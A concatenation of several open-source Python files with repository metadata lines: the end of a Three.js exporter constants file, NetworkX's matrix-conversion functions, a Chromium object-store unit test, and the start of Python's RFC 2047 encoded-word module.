MAP_BUMP_ANISOTROPY = 'mapBumpAnisotropy'
MAP_BUMP_SCALE = 'mapBumpScale'
NORMAL_BLENDING = 0
VERTEX_COLORS_ON = 2
VERTEX_COLORS_OFF = 0
THREE_BASIC = 'MeshBasicMaterial'
THREE_LAMBERT = 'MeshLambertMaterial'
THREE_PHONG = 'MeshPhongMaterial'
INTENSITY = 'intensity'
DISTANCE = 'distance'
ASPECT = 'aspect'
ANGLE = 'angle'
FOV = 'fov'
ASPECT = 'aspect'
NEAR = 'near'
FAR = 'far'
LEFT = 'left'
RIGHT = 'right'
TOP = 'top'
BOTTOM = 'bottom'
SHADING = 'shading'
COLOR_DIFFUSE = 'colorDiffuse'
COLOR_AMBIENT = 'colorAmbient'
COLOR_EMISSIVE = 'colorEmissive'
COLOR_SPECULAR = 'colorSpecular'
DBG_NAME = 'DbgName'
DBG_COLOR = 'DbgColor'
DBG_INDEX = 'DbgIndex'
EMIT = 'emit'
PHONG = 'phong'
LAMBERT = 'lambert'
BASIC = 'basic'
NORMAL_BLENDING = 'NormalBlending'
DBG_COLORS = (0xeeeeee, 0xee0000, 0x00ee00, 0x0000ee,
0xeeee00, 0x00eeee, 0xee00ee)
DOUBLE_SIDED = 'doubleSided'
EXPORT_SETTINGS_KEY = 'threeExportSettings'
| mit |
JFriel/honours_project | networkx/build/lib/networkx/convert_matrix.py | 10 | 33329 | """Functions to convert NetworkX graphs to and from numpy/scipy matrices.
The preferred way of converting data to a NetworkX graph is through the
graph constructor. The constructor calls the to_networkx_graph() function
which attempts to guess the input type and convert it automatically.
Examples
--------
Create a 10 node random graph from a numpy matrix
>>> import numpy
>>> a = numpy.reshape(numpy.random.random_integers(0,1,size=100),(10,10))
>>> D = nx.DiGraph(a)
or equivalently
>>> D = nx.to_networkx_graph(a,create_using=nx.DiGraph())
See Also
--------
nx_agraph, nx_pydot
"""
# Copyright (C) 2006-2014 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
import warnings
import itertools
import networkx as nx
from networkx.convert import _prep_create_using
from networkx.utils import not_implemented_for
__author__ = """\n""".join(['Aric Hagberg <aric.hagberg@gmail.com>',
'Pieter Swart (swart@lanl.gov)',
'Dan Schult(dschult@colgate.edu)'])
__all__ = ['from_numpy_matrix', 'to_numpy_matrix',
'from_pandas_dataframe', 'to_pandas_dataframe',
'to_numpy_recarray',
'from_scipy_sparse_matrix', 'to_scipy_sparse_matrix']
def to_pandas_dataframe(G, nodelist=None, multigraph_weight=sum, weight='weight', nonedge=0.0):
"""Return the graph adjacency matrix as a Pandas DataFrame.
Parameters
----------
G : graph
The NetworkX graph used to construct the Pandas DataFrame.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
If `nodelist` is None, then the ordering is produced by G.nodes().
multigraph_weight : {sum, min, max}, optional
An operator that determines how weights in multigraphs are handled.
The default is to sum the weights of the multiple edges.
weight : string or None, optional
The edge attribute that holds the numerical value used for
the edge weight. If an edge does not have that attribute, then the
value 1 is used instead.
nonedge : float, optional
The matrix values corresponding to nonedges are typically set to zero.
However, this could be undesirable if there are matrix values
corresponding to actual edges that also have the value zero. If so,
one might prefer nonedges to have some other value, such as nan.
Returns
-------
df : Pandas DataFrame
Graph adjacency matrix
Notes
-----
The DataFrame entries are assigned to the weight edge attribute. When
an edge does not have a weight attribute, the value of the entry is set to
the number 1. For multiple (parallel) edges, the values of the entries
are determined by the 'multigraph_weight' parameter. The default is to
sum the weight attributes for each of the parallel edges.
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Pandas DataFrame can be modified as follows:
>>> import pandas as pd
>>> import numpy as np
>>> G = nx.Graph([(1,1)])
>>> df = nx.to_pandas_dataframe(G)
>>> df
1
1 1
>>> df.values[np.diag_indices_from(df)] *= 2
>>> df
1
1 2
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> nx.to_pandas_dataframe(G, nodelist=[0,1,2])
0 1 2
0 0 2 0
1 1 0 0
2 0 0 4
"""
import pandas as pd
M = to_numpy_matrix(G, nodelist, None, None, multigraph_weight, weight, nonedge)
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
df = pd.DataFrame(data=M, index = nodelist ,columns = nodelist)
return df
def from_pandas_dataframe(df, source, target, edge_attr=None,
create_using=None):
"""Return a graph from Pandas DataFrame.
The Pandas DataFrame should contain at least two columns of node names and
zero or more columns of node attributes. Each row will be processed as one
edge instance.
Note: This function iterates over DataFrame.values, which is not
guaranteed to retain the data type across columns in the row. This is only
a problem if your row is entirely numeric and a mix of ints and floats. In
that case, all values will be returned as floats. See the
DataFrame.iterrows documentation for an example.
Parameters
----------
df : Pandas DataFrame
An edge list representation of a graph
source : str or int
A valid column name (string or integer) for the source nodes (for the
directed case).
target : str or int
A valid column name (string or integer) for the target nodes (for the
directed case).
edge_attr : str or int, iterable, True
A valid column name (str or integer) or list of column names that will
be used to retrieve items from the row and add them to the graph as edge
attributes. If `True`, all of the remaining columns will be added.
create_using : NetworkX graph
Use specified graph for result. The default is Graph()
See Also
--------
to_pandas_dataframe
Examples
--------
Simple integer weights on edges:
>>> import pandas as pd
>>> import numpy as np
>>> r = np.random.RandomState(seed=5)
>>> ints = r.random_integers(1, 10, size=(3,2))
>>> a = ['A', 'B', 'C']
>>> b = ['D', 'A', 'E']
>>> df = pd.DataFrame(ints, columns=['weight', 'cost'])
>>> df[0] = a
>>> df['b'] = b
>>> df
weight cost 0 b
0 4 7 A D
1 7 1 B A
2 10 9 C E
>>> G=nx.from_pandas_dataframe(df, 0, 'b', ['weight', 'cost'])
>>> G['E']['C']['weight']
10
>>> G['E']['C']['cost']
9
"""
g = _prep_create_using(create_using)
# Index of source and target
src_i = df.columns.get_loc(source)
tar_i = df.columns.get_loc(target)
if edge_attr:
# If all additional columns requested, build up a list of tuples
# [(name, index),...]
if edge_attr is True:
# Create a list of all columns indices, ignore nodes
edge_i = []
for i, col in enumerate(df.columns):
if col is not source and col is not target:
edge_i.append((col, i))
# If a list or tuple of name is requested
elif isinstance(edge_attr, (list, tuple)):
edge_i = [(i, df.columns.get_loc(i)) for i in edge_attr]
# If a string or int is passed
else:
edge_i = [(edge_attr, df.columns.get_loc(edge_attr)),]
# Iteration on values returns the rows as Numpy arrays
for row in df.values:
g.add_edge(row[src_i], row[tar_i], {i:row[j] for i, j in edge_i})
# If no column names are given, then just return the edges.
else:
for row in df.values:
g.add_edge(row[src_i], row[tar_i])
return g
def to_numpy_matrix(G, nodelist=None, dtype=None, order=None,
multigraph_weight=sum, weight='weight', nonedge=0.0):
"""Return the graph adjacency matrix as a NumPy matrix.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in ``nodelist``.
If ``nodelist`` is None, then the ordering is produced by G.nodes().
dtype : NumPy data type, optional
A valid single NumPy data type used to initialize the array.
This must be a simple type such as int or numpy.float64 and
not a compound data type (see to_numpy_recarray)
If None, then the NumPy default is used.
order : {'C', 'F'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. If None, then the NumPy default
is used.
multigraph_weight : {sum, min, max}, optional
An operator that determines how weights in multigraphs are handled.
The default is to sum the weights of the multiple edges.
weight : string or None optional (default = 'weight')
The edge attribute that holds the numerical value used for
the edge weight. If an edge does not have that attribute, then the
value 1 is used instead.
nonedge : float (default = 0.0)
The matrix values corresponding to nonedges are typically set to zero.
However, this could be undesirable if there are matrix values
corresponding to actual edges that also have the value zero. If so,
one might prefer nonedges to have some other value, such as nan.
Returns
-------
M : NumPy matrix
Graph adjacency matrix
See Also
--------
to_numpy_recarray, from_numpy_matrix
Notes
-----
The matrix entries are assigned to the weight edge attribute. When
an edge does not have a weight attribute, the value of the entry is set to
the number 1. For multiple (parallel) edges, the values of the entries
are determined by the ``multigraph_weight`` parameter. The default is to
sum the weight attributes for each of the parallel edges.
When ``nodelist`` does not contain every node in ``G``, the matrix is built
from the subgraph of ``G`` that is induced by the nodes in ``nodelist``.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Numpy matrix can be modified as follows:
>>> import numpy as np
>>> G = nx.Graph([(1, 1)])
>>> A = nx.to_numpy_matrix(G)
>>> A
matrix([[ 1.]])
>>> A.A[np.diag_indices_from(A)] *= 2
>>> A
matrix([[ 2.]])
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> nx.to_numpy_matrix(G, nodelist=[0,1,2])
matrix([[ 0., 2., 0.],
[ 1., 0., 0.],
[ 0., 0., 4.]])
"""
import numpy as np
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
if len(nodelist) != len(nodeset):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
nlen=len(nodelist)
undirected = not G.is_directed()
index=dict(zip(nodelist,range(nlen)))
# Initially, we start with an array of nans. Then we populate the matrix
# using data from the graph. Afterwards, any leftover nans will be
# converted to the value of `nonedge`. Note, we use nans initially,
# instead of zero, for two reasons:
#
# 1) It can be important to distinguish a real edge with the value 0
# from a nonedge with the value 0.
#
# 2) When working with multi(di)graphs, we must combine the values of all
# edges between any two nodes in some manner. This often takes the
# form of a sum, min, or max. Using the value 0 for a nonedge would
# have undesirable effects with min and max, but using nanmin and
# nanmax with initially nan values is not problematic at all.
#
# That said, there are still some drawbacks to this approach. Namely, if
# a real edge is nan, then that value is a) not distinguishable from
# nonedges and b) is ignored by the default combinator (nansum, nanmin,
# nanmax) functions used for multi(di)graphs. If this becomes an issue,
# an alternative approach is to use masked arrays. Initially, every
# element is masked and set to some `initial` value. As we populate the
# graph, elements are unmasked (automatically) when we combine the initial
# value with the values given by real edges. At the end, we convert all
# masked values to `nonedge`. Using masked arrays fully addresses reason 1,
# but for reason 2, we would still have the issue with min and max if the
# initial values were 0.0. Note: an initial value of +inf is appropriate
# for min, while an initial value of -inf is appropriate for max. When
# working with sum, an initial value of zero is appropriate. Ideally then,
# we'd want to allow users to specify both a value for nonedges and also
# an initial value. For multi(di)graphs, the choice of the initial value
# will, in general, depend on the combinator function---sensible defaults
# can be provided.
if G.is_multigraph():
# Handle MultiGraphs and MultiDiGraphs
M = np.zeros((nlen, nlen), dtype=dtype, order=order) + np.nan
# use numpy nan-aware operations
operator={sum:np.nansum, min:np.nanmin, max:np.nanmax}
try:
op=operator[multigraph_weight]
except:
raise ValueError('multigraph_weight must be sum, min, or max')
for u,v,attrs in G.edges_iter(data=True):
if (u in nodeset) and (v in nodeset):
i, j = index[u], index[v]
e_weight = attrs.get(weight, 1)
M[i,j] = op([e_weight, M[i,j]])
if undirected:
M[j,i] = M[i,j]
else:
# Graph or DiGraph, this is much faster than above
M = np.zeros((nlen,nlen), dtype=dtype, order=order) + np.nan
for u,nbrdict in G.adjacency_iter():
for v,d in nbrdict.items():
try:
M[index[u],index[v]] = d.get(weight,1)
except KeyError:
# This occurs when there are fewer desired nodes than
# there are nodes in the graph: len(nodelist) < len(G)
pass
M[np.isnan(M)] = nonedge
M = np.asmatrix(M)
return M
def from_numpy_matrix(A, parallel_edges=False, create_using=None):
"""Return a graph from numpy matrix.
The numpy matrix is interpreted as an adjacency matrix for the graph.
Parameters
----------
A : numpy matrix
An adjacency matrix representation of a graph
parallel_edges : Boolean
If this is ``True``, ``create_using`` is a multigraph, and ``A`` is an
integer matrix, then entry *(i, j)* in the matrix is interpreted as the
number of parallel edges joining vertices *i* and *j* in the graph. If it
is ``False``, then the entries in the adjacency matrix are interpreted as
the weight of a single edge joining the vertices.
create_using : NetworkX graph
Use specified graph for result. The default is Graph()
Notes
-----
If ``create_using`` is an instance of :class:`networkx.MultiGraph` or
:class:`networkx.MultiDiGraph`, ``parallel_edges`` is ``True``, and the
entries of ``A`` are of type ``int``, then this function returns a multigraph
(of the same type as ``create_using``) with parallel edges.
If ``create_using`` is an undirected multigraph, then only the edges
indicated by the upper triangle of the matrix `A` will be added to the
graph.
If the numpy matrix has a single data type for each matrix entry it
will be converted to an appropriate Python data type.
If the numpy matrix has a user-specified compound data type the names
of the data fields will be used as attribute keys in the resulting
NetworkX graph.
See Also
--------
to_numpy_matrix, to_numpy_recarray
Examples
--------
Simple integer weights on edges:
>>> import numpy
>>> A=numpy.matrix([[1, 1], [2, 1]])
>>> G=nx.from_numpy_matrix(A)
If ``create_using`` is a multigraph and the matrix has only integer entries,
the entries will be interpreted as weighted edges joining the vertices
(without creating parallel edges):
>>> import numpy
>>> A = numpy.matrix([[1, 1], [1, 2]])
>>> G = nx.from_numpy_matrix(A, create_using = nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 2}}
If ``create_using`` is a multigraph and the matrix has only integer entries
but ``parallel_edges`` is ``True``, then the entries will be interpreted as
the number of parallel edges joining those two vertices:
>>> import numpy
>>> A = numpy.matrix([[1, 1], [1, 2]])
>>> temp = nx.MultiGraph()
>>> G = nx.from_numpy_matrix(A, parallel_edges = True, create_using = temp)
>>> G[1][1]
{0: {'weight': 1}, 1: {'weight': 1}}
User defined compound data type on edges:
>>> import numpy
>>> dt = [('weight', float), ('cost', int)]
>>> A = numpy.matrix([[(1.0, 2)]], dtype = dt)
>>> G = nx.from_numpy_matrix(A)
>>> G.edges()
[(0, 0)]
>>> G[0][0]['cost']
2
>>> G[0][0]['weight']
1.0
"""
# This should never fail if you have created a numpy matrix with numpy...
import numpy as np
kind_to_python_type={'f':float,
'i':int,
'u':int,
'b':bool,
'c':complex,
'S':str,
'V':'void'}
try: # Python 3.x
blurb = chr(1245) # just to trigger the exception
kind_to_python_type['U']=str
except ValueError: # Python 2.6+
kind_to_python_type['U']=unicode
G=_prep_create_using(create_using)
n,m=A.shape
if n!=m:
raise nx.NetworkXError("Adjacency matrix is not square.",
"nx,ny=%s"%(A.shape,))
dt=A.dtype
try:
python_type=kind_to_python_type[dt.kind]
except:
raise TypeError("Unknown numpy data type: %s"%dt)
# Make sure we get even the isolated nodes of the graph.
G.add_nodes_from(range(n))
# Get a list of all the entries in the matrix with nonzero entries. These
# coordinates will become the edges in the graph.
edges = zip(*(np.asarray(A).nonzero()))
# handle numpy constructed data type
if python_type == 'void':
# Sort the fields by their offset, then by dtype, then by name.
fields = sorted((offset, dtype, name) for name, (dtype, offset) in
A.dtype.fields.items())
triples = ((u, v, {name: kind_to_python_type[dtype.kind](val)
for (_, dtype, name), val in zip(fields, A[u, v])})
for u, v in edges)
# If the entries in the adjacency matrix are integers, the graph is a
# multigraph, and parallel_edges is True, then create parallel edges, each
# with weight 1, for each entry in the adjacency matrix. Otherwise, create
# one edge for each positive entry in the adjacency matrix and set the
# weight of that edge to be the entry in the matrix.
elif python_type is int and G.is_multigraph() and parallel_edges:
chain = itertools.chain.from_iterable
# The following line is equivalent to:
#
# for (u, v) in edges:
# for d in range(A[u, v]):
# G.add_edge(u, v, weight=1)
#
triples = chain(((u, v, dict(weight=1)) for d in range(A[u, v]))
for (u, v) in edges)
else: # basic data type
triples = ((u, v, dict(weight=python_type(A[u, v])))
for u, v in edges)
# If we are creating an undirected multigraph, only add the edges from the
# upper triangle of the matrix. Otherwise, add all the edges. This relies
# on the fact that the vertices created in the
# ``_generated_weighted_edges()`` function are actually the row/column
# indices for the matrix ``A``.
#
# Without this check, we run into a problem where each edge is added twice
# when ``G.add_edges_from()`` is invoked below.
if G.is_multigraph() and not G.is_directed():
triples = ((u, v, d) for u, v, d in triples if u <= v)
G.add_edges_from(triples)
return G
@not_implemented_for('multigraph')
def to_numpy_recarray(G,nodelist=None,
dtype=[('weight',float)],
order=None):
"""Return the graph adjacency matrix as a NumPy recarray.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
If `nodelist` is None, then the ordering is produced by G.nodes().
dtype : NumPy data-type, optional
A valid NumPy named dtype used to initialize the NumPy recarray.
The data type names are assumed to be keys in the graph edge attribute
dictionary.
order : {'C', 'F'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. If None, then the NumPy default
is used.
Returns
-------
M : NumPy recarray
The graph with specified edge data as a Numpy recarray
Notes
-----
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
Examples
--------
>>> G = nx.Graph()
>>> G.add_edge(1,2,weight=7.0,cost=5)
>>> A=nx.to_numpy_recarray(G,dtype=[('weight',float),('cost',int)])
>>> print(A.weight)
[[ 0. 7.]
[ 7. 0.]]
>>> print(A.cost)
[[0 5]
[5 0]]
"""
import numpy as np
if nodelist is None:
nodelist = G.nodes()
nodeset = set(nodelist)
if len(nodelist) != len(nodeset):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
nlen=len(nodelist)
undirected = not G.is_directed()
index=dict(zip(nodelist,range(nlen)))
M = np.zeros((nlen,nlen), dtype=dtype, order=order)
names=M.dtype.names
for u,v,attrs in G.edges_iter(data=True):
if (u in nodeset) and (v in nodeset):
i,j = index[u],index[v]
values=tuple([attrs[n] for n in names])
M[i,j] = values
if undirected:
M[j,i] = M[i,j]
return M.view(np.recarray)
def to_scipy_sparse_matrix(G, nodelist=None, dtype=None,
weight='weight', format='csr'):
"""Return the graph adjacency matrix as a SciPy sparse matrix.
Parameters
----------
G : graph
The NetworkX graph used to construct the NumPy matrix.
nodelist : list, optional
The rows and columns are ordered according to the nodes in `nodelist`.
If `nodelist` is None, then the ordering is produced by G.nodes().
dtype : NumPy data-type, optional
A valid NumPy dtype used to initialize the array. If None, then the
NumPy default is used.
weight : string or None optional (default='weight')
The edge attribute that holds the numerical value used for
the edge weight. If None then all edge weights are 1.
format : str in {'bsr', 'csr', 'csc', 'coo', 'lil', 'dia', 'dok'}
The type of the matrix to be returned (default 'csr'). For
some algorithms different implementations of sparse matrices
can perform better. See [1]_ for details.
Returns
-------
M : SciPy sparse matrix
Graph adjacency matrix.
Notes
-----
The matrix entries are populated using the edge attribute held in
parameter weight. When an edge does not have that attribute, the
value of the entry is 1.
For multiple edges the matrix values are the sums of the edge weights.
When `nodelist` does not contain every node in `G`, the matrix is built
from the subgraph of `G` that is induced by the nodes in `nodelist`.
Uses coo_matrix format. To convert to other formats specify the
format= keyword.
The convention used for self-loop edges in graphs is to assign the
diagonal matrix entry value to the weight attribute of the edge
(or the number 1 if the edge has no weight attribute). If the
alternate convention of doubling the edge weight is desired the
resulting Scipy sparse matrix can be modified as follows:
>>> import scipy as sp
>>> G = nx.Graph([(1,1)])
>>> A = nx.to_scipy_sparse_matrix(G)
>>> print(A.todense())
[[1]]
>>> A.setdiag(A.diagonal()*2)
>>> print(A.todense())
[[2]]
Examples
--------
>>> G = nx.MultiDiGraph()
>>> G.add_edge(0,1,weight=2)
>>> G.add_edge(1,0)
>>> G.add_edge(2,2,weight=3)
>>> G.add_edge(2,2)
>>> S = nx.to_scipy_sparse_matrix(G, nodelist=[0,1,2])
>>> print(S.todense())
[[0 2 0]
[1 0 0]
[0 0 4]]
References
----------
.. [1] Scipy Dev. References, "Sparse Matrices",
http://docs.scipy.org/doc/scipy/reference/sparse.html
"""
from scipy import sparse
if nodelist is None:
nodelist = G
nlen = len(nodelist)
if nlen == 0:
raise nx.NetworkXError("Graph has no nodes or edges")
if len(nodelist) != len(set(nodelist)):
msg = "Ambiguous ordering: `nodelist` contained duplicates."
raise nx.NetworkXError(msg)
index = dict(zip(nodelist,range(nlen)))
if G.number_of_edges() == 0:
row,col,data=[],[],[]
else:
row,col,data = zip(*((index[u],index[v],d.get(weight,1))
for u,v,d in G.edges_iter(nodelist, data=True)
if u in index and v in index))
if G.is_directed():
M = sparse.coo_matrix((data,(row,col)),
shape=(nlen,nlen), dtype=dtype)
else:
# symmetrize matrix
d = data + data
r = row + col
c = col + row
# selfloop entries get double counted when symmetrizing
# so we subtract the data on the diagonal
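# (COO format sums duplicate entries, so a self-loop weight w that was
# appended twice above nets out to a single w once the -w diagonal
# entry is added)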
selfloops = G.selfloop_edges(data=True)
if selfloops:
diag_index,diag_data = zip(*((index[u],-d.get(weight,1))
for u,v,d in selfloops
if u in index and v in index))
d += diag_data
r += diag_index
c += diag_index
M = sparse.coo_matrix((d, (r, c)), shape=(nlen,nlen), dtype=dtype)
try:
return M.asformat(format)
except AttributeError:
raise nx.NetworkXError("Unknown sparse matrix format: %s"%format)
def _csr_gen_triples(A):
"""Converts a SciPy sparse matrix in **Compressed Sparse Row** format to
an iterable of weighted edge triples.
"""
nrows = A.shape[0]
data, indices, indptr = A.data, A.indices, A.indptr
for i in range(nrows):
for j in range(indptr[i], indptr[i+1]):
yield i, indices[j], data[j]
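# For illustration (a sketch): the CSR form of [[0, 2], [3, 0]] has
# data=[2, 3], indices=[1, 0], indptr=[0, 1, 2], so the generator above
# yields (0, 1, 2) and then (1, 0, 3).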
def _csc_gen_triples(A):
"""Converts a SciPy sparse matrix in **Compressed Sparse Column** format to
an iterable of weighted edge triples.
"""
ncols = A.shape[1]
data, indices, indptr = A.data, A.indices, A.indptr
for i in range(ncols):
for j in range(indptr[i], indptr[i+1]):
yield indices[j], i, data[j]
def _coo_gen_triples(A):
"""Converts a SciPy sparse matrix in **Coordinate** format to an iterable
of weighted edge triples.
"""
row, col, data = A.row, A.col, A.data
return zip(row, col, data)
def _dok_gen_triples(A):
"""Converts a SciPy sparse matrix in **Dictionary of Keys** format to an
iterable of weighted edge triples.
"""
for (r, c), v in A.items():
yield r, c, v
def _generate_weighted_edges(A):
"""Returns an iterable over (u, v, w) triples, where u and v are adjacent
vertices and w is the weight of the edge joining u and v.
`A` is a SciPy sparse matrix (in any format).
"""
if A.format == 'csr':
return _csr_gen_triples(A)
if A.format == 'csc':
return _csc_gen_triples(A)
if A.format == 'dok':
return _dok_gen_triples(A)
# If A is in any other format (including COO), convert it to COO format.
return _coo_gen_triples(A.tocoo())
def from_scipy_sparse_matrix(A, parallel_edges=False, create_using=None,
edge_attribute='weight'):
"""Creates a new graph from an adjacency matrix given as a SciPy sparse
matrix.
Parameters
----------
A: scipy sparse matrix
An adjacency matrix representation of a graph
parallel_edges : Boolean
If this is ``True``, `create_using` is a multigraph, and `A` is an
integer matrix, then entry *(i, j)* in the matrix is interpreted as the
number of parallel edges joining vertices *i* and *j* in the graph. If it
is ``False``, then the entries in the adjacency matrix are interpreted as
the weight of a single edge joining the vertices.
create_using: NetworkX graph
Use specified graph for result. The default is Graph()
edge_attribute: string
Name of edge attribute to store matrix numeric value. The data will
have the same type as the matrix entry (int, float, (real,imag)).
Notes
-----
If `create_using` is an instance of :class:`networkx.MultiGraph` or
:class:`networkx.MultiDiGraph`, `parallel_edges` is ``True``, and the
entries of `A` are of type ``int``, then this function returns a multigraph
(of the same type as `create_using`) with parallel edges. In this case,
`edge_attribute` will be ignored.
If `create_using` is an undirected multigraph, then only the edges
indicated by the upper triangle of the matrix `A` will be added to the
graph.
Examples
--------
>>> import scipy.sparse
>>> A = scipy.sparse.eye(2,2,1)
>>> G = nx.from_scipy_sparse_matrix(A)
If `create_using` is a multigraph and the matrix has only integer entries,
the entries will be interpreted as weighted edges joining the vertices
(without creating parallel edges):
>>> import scipy
>>> A = scipy.sparse.csr_matrix([[1, 1], [1, 2]])
>>> G = nx.from_scipy_sparse_matrix(A, create_using=nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 2}}
If `create_using` is a multigraph and the matrix has only integer entries
but `parallel_edges` is ``True``, then the entries will be interpreted as
the number of parallel edges joining those two vertices:
>>> import scipy
>>> A = scipy.sparse.csr_matrix([[1, 1], [1, 2]])
>>> G = nx.from_scipy_sparse_matrix(A, parallel_edges=True,
... create_using=nx.MultiGraph())
>>> G[1][1]
{0: {'weight': 1}, 1: {'weight': 1}}
"""
G = _prep_create_using(create_using)
n,m = A.shape
if n != m:
raise nx.NetworkXError(
"Adjacency matrix is not square. nx,ny=%s" % (A.shape,))
# Make sure we get even the isolated nodes of the graph.
G.add_nodes_from(range(n))
# Create an iterable over (u, v, w) triples and for each triple, add an
# edge from u to v with weight w.
triples = _generate_weighted_edges(A)
# If the entries in the adjacency matrix are integers, the graph is a
# multigraph, and parallel_edges is True, then create parallel edges, each
# with weight 1, for each entry in the adjacency matrix. Otherwise, create
# one edge for each positive entry in the adjacency matrix and set the
# weight of that edge to be the entry in the matrix.
if A.dtype.kind in ('i', 'u') and G.is_multigraph() and parallel_edges:
chain = itertools.chain.from_iterable
# The following line is equivalent to:
#
# for (u, v) in edges:
# for d in range(A[u, v]):
# G.add_edge(u, v, weight=1)
#
triples = chain(((u, v, 1) for d in range(w)) for (u, v, w) in triples)
# If we are creating an undirected multigraph, only add the edges from the
# upper triangle of the matrix. Otherwise, add all the edges. This relies
# on the fact that the vertices created in the
# ``_generated_weighted_edges()`` function are actually the row/column
# indices for the matrix ``A``.
#
# Without this check, we run into a problem where each edge is added twice
# when `G.add_weighted_edges_from()` is invoked below.
if G.is_multigraph() and not G.is_directed():
triples = ((u, v, d) for u, v, d in triples if u <= v)
G.add_weighted_edges_from(triples, weight=edge_attribute)
return G
# fixture for nose tests
def setup_module(module):
from nose import SkipTest
try:
import numpy
except:
raise SkipTest("NumPy not available")
try:
import scipy
except:
raise SkipTest("SciPy not available")
try:
import pandas
except:
raise SkipTest("Pandas not available")
| gpl-3.0 |
Nu3001/external_chromium_org | chrome/common/extensions/docs/server2/test_object_store_test.py | 153 | 1495 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from test_object_store import TestObjectStore
import unittest
class TestObjectStoreTest(unittest.TestCase):
def testEmpty(self):
store = TestObjectStore('namespace')
self.assertEqual(None, store.Get('hi').Get())
self.assertEqual({}, store.GetMulti(['hi', 'lo']).Get())
def testNonEmpty(self):
store = TestObjectStore('namespace')
store.Set('hi', 'bye')
self.assertEqual('bye', store.Get('hi').Get())
self.assertEqual({'hi': 'bye'}, store.GetMulti(['hi', 'lo']).Get())
store.Set('hi', 'blah')
self.assertEqual('blah', store.Get('hi').Get())
self.assertEqual({'hi': 'blah'}, store.GetMulti(['hi', 'lo']).Get())
store.Del('hi')
self.assertEqual(None, store.Get('hi').Get())
self.assertEqual({}, store.GetMulti(['hi', 'lo']).Get())
def testCheckAndReset(self):
store = TestObjectStore('namespace')
store.Set('x', 'y')
self.assertTrue(*store.CheckAndReset(set_count=1))
store.Set('x', 'y')
store.Set('x', 'y')
self.assertTrue(*store.CheckAndReset(set_count=2))
store.Set('x', 'y')
store.Set('x', 'y')
store.Get('x').Get()
store.Get('x').Get()
store.Get('x').Get()
store.Del('x')
self.assertTrue(*store.CheckAndReset(get_count=3, set_count=2, del_count=1))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
firerszd/kbengine | kbe/src/lib/python/Lib/email/_encoded_words.py | 85 | 7913 | """ Routines for manipulating RFC2047 encoded words.
This is currently a package-private API, but will be considered for promotion
to a public API if there is demand.
"""
# An encoded word looks like this:
#
# =?charset[*lang]?cte?encoded_string?=
#
# for more information about charset see the charset module. Here it is one
# of the preferred MIME charset names (hopefully; you never know when parsing).
# cte (Content Transfer Encoding) is either 'q' or 'b' (ignoring case). In
# theory other letters could be used for other encodings, but in practice this
# (almost?) never happens. There could be a public API for adding entries
# to the CTE tables, but YAGNI for now. 'q' is Quoted Printable, 'b' is
# Base64. The meaning of encoded_string should be obvious. 'lang' is optional
# as indicated by the brackets (they are not part of the syntax) but is almost
# never encountered in practice.
#
# The general interface for a CTE decoder is that it takes the encoded_string
# as its argument, and returns a tuple (cte_decoded_string, defects). The
# cte_decoded_string is the original binary that was encoded using the
# specified cte. 'defects' is a list of MessageDefect instances indicating any
# problems encountered during conversion. 'charset' and 'lang' are the
# corresponding strings extracted from the EW, case preserved.
#
# The general interface for a CTE encoder is that it takes a binary sequence
# as input and returns the cte_encoded_string, which is an ascii-only string.
#
# Each decoder must also supply a length function that takes the binary
# sequence as its argument and returns the length of the resulting encoded
# string.
#
# The main API functions for the module are decode, which calls the decoder
# referenced by the cte specifier, and encode, which adds the appropriate
# RFC 2047 "chrome" to the encoded string, and can optionally automatically
# select the shortest possible encoding. See their docstrings below for
# details.
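# For illustration (an example added here, not part of the original
# notes): the encoded word '=?utf-8?q?caf=C3=A9?=' has charset 'utf-8',
# cte 'q' and encoded_string 'caf=C3=A9'; decode() below returns
# ('café', 'utf-8', '', []).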
import re
import base64
import binascii
import functools
from string import ascii_letters, digits
from email import errors
__all__ = ['decode_q',
'encode_q',
'decode_b',
'encode_b',
'len_q',
'len_b',
'decode',
'encode',
]
#
# Quoted Printable
#
# regex based decoder.
_q_byte_subber = functools.partial(re.compile(br'=([a-fA-F0-9]{2})').sub,
lambda m: bytes([int(m.group(1), 16)]))
def decode_q(encoded):
encoded = encoded.replace(b'_', b' ')
return _q_byte_subber(encoded), []
# dict mapping bytes to their encoded form
class _QByteMap(dict):
safe = b'-!*+/' + ascii_letters.encode('ascii') + digits.encode('ascii')
def __missing__(self, key):
if key in self.safe:
self[key] = chr(key)
else:
self[key] = "={:02X}".format(key)
return self[key]
